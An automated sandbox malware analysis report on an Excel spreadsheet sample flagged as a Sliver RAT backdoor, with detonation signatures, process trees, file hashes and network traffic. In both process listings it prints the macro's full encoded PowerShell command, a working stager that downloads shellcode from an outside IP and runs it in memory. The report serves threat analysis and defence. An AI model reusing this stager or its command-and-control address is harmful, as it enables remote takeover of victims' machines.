Malware Analysis Report

2024-11-15 05:22

Sample ID 241110-1kbh7swdrc
Target 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b
SHA256 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b
Tags
macro macro_on_action sliver backdoor discovery execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b

Threat Level: Known bad

The file 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action sliver backdoor discovery execution trojan

SliverRAT

Sliver RAT v2

Sliver family

Process spawned unexpected child process

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 21:42

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 21:42

Reported

2024-11-10 21:43

Platform

win7-20240903-en

Max time kernel

19s

Max time network

19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1048 wrote to memory of 3064 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 3064 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 3064 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 3064 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 3064 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 3064 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 3064 wrote to memory of 2488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2488 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2488 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2488 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2488 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6apyv-cj.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8641.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8640.tmp"

Network

Country Destination Domain Proto
CH 194.182.164.149:8080 194.182.164.149 tcp

Files

memory/1048-1-0x000000007215D000-0x0000000072168000-memory.dmp

memory/1048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1048-2-0x00000000001F0000-0x00000000002F0000-memory.dmp

memory/1048-3-0x00000000001F0000-0x00000000002F0000-memory.dmp

memory/1048-6-0x00000000001F0000-0x00000000002F0000-memory.dmp

memory/1048-7-0x00000000001F0000-0x00000000002F0000-memory.dmp

memory/1048-9-0x00000000001F0000-0x00000000002F0000-memory.dmp

memory/1048-4-0x00000000001F0000-0x00000000002F0000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\6apyv-cj.cmdline

MD5 50667e81d82ea0396407d217431b3421
SHA1 2287b97de9ccde8bbda3074ed5018f3fd1fb91f9
SHA256 c782079ff164ece512be7e95e912f4245cac1c463eb0abc4fca25a0196f16f64
SHA512 410d076841815ee00dcdb94f69f8f1b7ab194bb082738187ad8df5b5a87ba786bcd6c2c252d5cfdaf8e81d1ce453b997646035093dfa92b76e802288cb7f61de

\??\c:\Users\Admin\AppData\Local\Temp\6apyv-cj.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\CSC8640.tmp

MD5 18cdd79a4c3f79b53642b025371f6442
SHA1 42636d5fe4e46f6ebfff39c8ad189411e8f07c9d
SHA256 133931259d58738136f2d7c9b31e5073d8c2bd2ed2ba788ac6972c84eedbe10e
SHA512 e9073291ef9fc5993f5d9ebd4d1e7d6f8fbd81279f10ba59ba3f1e04687a944f28868d2afcad007030bf72a20081b2efc72aa2bb75530856a68369df46da957b

C:\Users\Admin\AppData\Local\Temp\RES8641.tmp

MD5 e4958954769be4a0e5b4516db5e4b6f2
SHA1 c55499ecf09102c463b637d9037dd2584a3f9786
SHA256 81426fae309a4dac4822027edca43a6499464e15daa6e26cfb3a9963b529b57d
SHA512 ba9cdfcfdcff5dcea45f484fad7bddee46fc23c294bbec7db9f61247f9066041835bf105915bbbd796fa5973c738fcd12977e9bc4b0dade3cd1c413a410438ad

C:\Users\Admin\AppData\Local\Temp\6apyv-cj.dll

MD5 bfa41b18349a932f9e12022ca4207a1d
SHA1 672e05b2e8ddd714e7754781fdd3367548363902
SHA256 3bdb90384cc67fbf254901ea409ec1f1bdbfd86d913784a069a7c02f5d7be0c2
SHA512 a4b20f9e0095c8eeb6b5566f9a65e88d43bfc97d244f66a661f713953e1a055e8578e69524180714421d99d636749c84b5aee74bac557050a570fc6f5140621a

C:\Users\Admin\AppData\Local\Temp\6apyv-cj.pdb

MD5 875c9c01092d0c25817e99a415b63b03
SHA1 4167e82a8e408a0b20afd0588d1eff7db8466541
SHA256 43805c4b239ab1cb6eb6e1980d96c1618389e68f5ee9b97f68e9974970f5d4b0
SHA512 a97fa9f87ee25ed056c5e52d673bbdc093e3bd672b019c30067bb49bba8913d13bfad550821f77d3c536235558b14a8b4ae3bc3c7dca58e0a3a594c17f309531

C:\Users\Admin\AppData\Local\Temp\Cab92DF.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1048-43-0x000000007215D000-0x0000000072168000-memory.dmp

memory/1048-44-0x00000000001F0000-0x00000000002F0000-memory.dmp

memory/3064-45-0x00000000068A0000-0x000000000731E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 21:42

Reported

2024-11-10 21:43

Platform

win10v2004-20241007-en

Max time kernel

58s

Max time network

62s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB3A0.tmp" "c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\CSC25C7100A10844DBB887329B8E6CD3D2.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
CH 194.182.164.149:8080 194.182.164.149 tcp
US 8.8.8.8:53 149.164.182.194.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp
CH 194.182.164.149:443 tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
